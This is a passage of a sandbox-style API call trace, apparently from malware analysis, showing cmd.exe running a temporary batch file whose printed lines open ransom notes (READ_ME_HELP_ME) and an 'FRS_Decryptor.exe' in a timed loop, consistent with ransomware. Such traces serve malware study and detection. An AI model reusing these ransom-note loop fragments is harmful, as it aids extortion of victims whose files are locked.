returned 1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0101.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0101.981] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.981] GetFileType (hFile=0x158) returned 0x1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0101.981] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0101.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0101.981] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.981] GetFileType (hFile=0x158) returned 0x1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0101.981] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0101.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0101.981] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.981] GetFileType (hFile=0x158) returned 0x1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0101.981] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0101.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0101.981] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.981] GetFileType (hFile=0x158) returned 0x1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0101.981] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0101.981] SetFilePointer (in: hFile=0x158, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0101.981] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0101.982] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.982] GetFileType (hFile=0x158) returned 0x1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0101.982] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0101.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0101.982] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.982] GetFileType (hFile=0x158) returned 0x1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0101.982] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0101.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0101.982] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.982] GetFileType (hFile=0x158) returned 0x1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0101.982] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0101.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0101.982] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.982] GetFileType (hFile=0x158) returned 0x1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0101.982] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0101.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0101.982] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0101.982] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.982] GetFileType (hFile=0x158) returned 0x1 [0101.983] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0101.983] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0101.983] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0101.983] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0101.983] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0101.983] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.983] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0101.983] _get_osfhandle (_FileHandle=0) returned 0x24 [0101.983] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0101.983] SetConsoleInputExeNameW () returned 0x1 [0101.983] GetConsoleOutputCP () returned 0x1b5 [0101.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0101.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0101.984] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0101.984] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0101.984] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.984] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0101.984] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0101.984] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0101.984] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0101.984] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0101.984] GetFileType (hFile=0x158) returned 0x1 [0101.984] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.984] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0101.984] _tell (_FileHandle=3) returned 2512 [0101.984] _close (_FileHandle=3) returned 0 [0101.984] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0101.984] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0101.984] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0101.984] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0101.984] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0101.984] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0101.984] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0101.984] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0101.984] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0101.984] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0101.984] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0101.984] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0101.984] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0101.984] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0101.984] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0101.984] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0101.984] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0101.985] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0101.985] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0101.985] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0101.985] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0101.985] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0101.985] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0101.985] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0101.985] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0101.985] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0101.985] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0101.985] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0101.985] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0101.985] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0101.985] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0101.985] _wcsicmp (_String1="ping", _String2="START") returned -3 [0101.985] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0101.985] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0101.985] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0101.985] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0101.985] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0101.985] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0101.985] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0101.985] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0101.985] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0101.985] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0101.985] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0101.985] SetErrorMode (uMode=0x0) returned 0x0 [0101.985] SetErrorMode (uMode=0x1) returned 0x0 [0101.985] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0101.985] SetErrorMode (uMode=0x0) returned 0x1 [0101.985] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.985] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0101.985] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.985] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0101.985] GetLastError () returned 0x2 [0101.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.986] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a030 [0101.986] FindClose (in: hFindFile=0xd5a030 | out: hFindFile=0xd5a030) returned 1 [0101.986] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0101.986] GetLastError () returned 0x2 [0101.986] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0101.986] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0101.986] GetFileType (hFile=0x28) returned 0x2 [0101.986] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0101.986] _dup (_FileHandle=1) returned 3 [0101.986] _close (_FileHandle=1) returned 0 [0101.986] _wcsicmp (_String1="nul", _String2="con") returned 11 [0101.986] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0101.986] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0101.986] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0101.987] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0101.987] SetErrorMode (uMode=0x0) returned 0x0 [0101.987] SetErrorMode (uMode=0x1) returned 0x0 [0101.987] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0101.987] SetErrorMode (uMode=0x0) returned 0x1 [0101.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.987] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0101.987] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.987] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0101.987] GetLastError () returned 0x2 [0101.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0101.987] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0101.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0101.987] GetLastError () returned 0x2 [0101.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0101.987] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0101.987] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0101.988] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0101.988] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0101.988] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0101.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0101.989] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0101.989] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 